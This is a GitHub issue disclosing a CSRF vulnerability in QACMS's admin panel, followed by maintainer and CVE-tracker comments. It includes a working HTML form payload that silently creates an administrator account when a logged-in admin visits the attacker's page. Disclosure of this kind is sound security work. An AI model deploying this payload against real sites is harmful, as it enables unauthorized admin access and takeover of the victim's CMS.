Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CSRF issue that allows attacker to create an account #187

Open
fvi-att opened this issue Mar 27, 2018 · 2 comments
Open

CSRF issue that allows attacker to create an account #187

fvi-att opened this issue Mar 27, 2018 · 2 comments
Labels
Defect Hold

Comments

@fvi-att
Copy link

fvi-att commented Mar 27, 2018
edited
Loading

Hello. I'd like to report a security issue on the admin page.

Summary

this vuln is CSRF vuln that allows creating any kinds of account.

When an attacker induces authorized victims to a malicious webpage and make them send requests. a victim creates an account without their intent.

Reproduce

This is a step how to reproduce.

  1. Access to the html page contains the payload after you login to admin(/en_US/admin/) page.

Then you find an admin account named [test] is created.

Payloads

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://your.cms.domain.example.com/en_US/admin/user/manage/add" method="POST">
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="email" value="test&#64;example&#46;com" />
      <input type="hidden" name="web" value="" />
      <input type="hidden" name="locale" value="" />
      <input type="hidden" name="status" value="0" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="password2" value="testtest" />
      <input type="hidden" name="roles&#91;&#95;ids&#93;" value="" />
      <input type="hidden" name="roles&#91;&#95;ids&#93;&#91;&#93;" value="1" />
      <input type="hidden" name="welcome&#95;message" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

I think this security issue is not serious. Because attack using this vulnerability requires induction.

Event

  • 2018-03-15 this vulnerability is discovered.
  • 2018-03-27 Open an issue on Github.
@botchris
Copy link
Collaborator

botchris commented Apr 4, 2018

Fixing CSRF in QACMS in general may produce several problem as QACMS heavily relies on AJAX and dynamic forms building. We could try to secure certain sections of the CMS, such as content/user editing forms, etc.

@botchris botchris mentioned this issue Aug 10, 2018
Closed
@NicoleG25
Copy link

@ChristopherCastro do you plan to address this? note that a CVE was assigned to this issue.
If you disagree with the assignment you may contact MITRE directly to reject the CVE.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
Defect Hold
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@botchris @fvi-att @NicoleG25